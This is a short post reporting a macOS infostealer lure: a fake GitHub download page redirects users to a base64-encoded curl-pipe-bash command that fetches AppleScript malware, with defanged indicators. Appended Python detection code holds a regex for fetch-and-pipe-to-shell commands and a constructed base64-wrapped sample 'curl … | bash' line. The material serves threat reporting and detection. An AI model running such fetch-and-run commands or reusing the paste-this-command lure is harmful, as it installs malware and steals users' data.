Nice, I've found an infostealer in the wild!
-
This repo just has some info and a download button for a paid macOS app.
It links to hxxps://za-loop-osx-software[.]github[.]io/.github/RoyalTSX, which redirects you to hxxps://github[.]topic-developer[.]com/packages.html, which tells you to run a curl command and pipe it into bash, encoded in a base64 string. The curl command grabs a file from 217[.]119[.]139[.]117, which looks like an infostealer and some other malware written in AppleScript.
Have fun SOC people.
-
Clever bait, for an infostealer.
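
The delivery step described in the post above (a base64-encoded curl command piped into bash) can be hunted for in process command lines or clipboard/paste telemetry. The following is an added detection example, not part of the original thread; the function names, sample command lines and the 192.0.2.10 host are constructed for illustration.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hide a short shell command.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# A downloader whose output is piped straight into a shell interpreter.
FETCH_PIPE_SHELL = re.compile(
    r"\b(curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:/bin/)?(bash|zsh|sh)\b")
HOST = re.compile(r"https?://([^/\s'\"]+)")

def decoded_layers(text, max_depth=3):
    """Yield text, then recursively every base64 run in it that decodes to readable text."""
    yield text
    if max_depth == 0:
        return
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            inner = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or decodes to binary: ignore this run
        if all(c.isprintable() or c.isspace() for c in inner):
            yield from decoded_layers(inner, max_depth - 1)

def findings(cmdline):
    """Return (downloader, shell, host) for each fetch-and-pipe at any decoding layer."""
    out = []
    for layer in decoded_layers(cmdline):
        for m in FETCH_PIPE_SHELL.finditer(layer):
            host = HOST.search(m.group(0))
            out.append((m.group(1), m.group(2), host.group(1) if host else None))
    return out

# Constructed samples; 192.0.2.10 is a documentation address, not an indicator from the post.
INNER = "curl -fsSL http://192.0.2.10/install.sh | bash"
SAMPLES = [
    'echo "%s" | base64 -d | bash' % base64.b64encode(INNER.encode()).decode(),
    "curl -O https://example.com/tool.dmg",
    "brew install wget",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(findings(s) or "clean", "<-", s[:60])
```

Only the first sample is flagged: the plain download and the package install contain no fetch-and-pipe at any decoding layer.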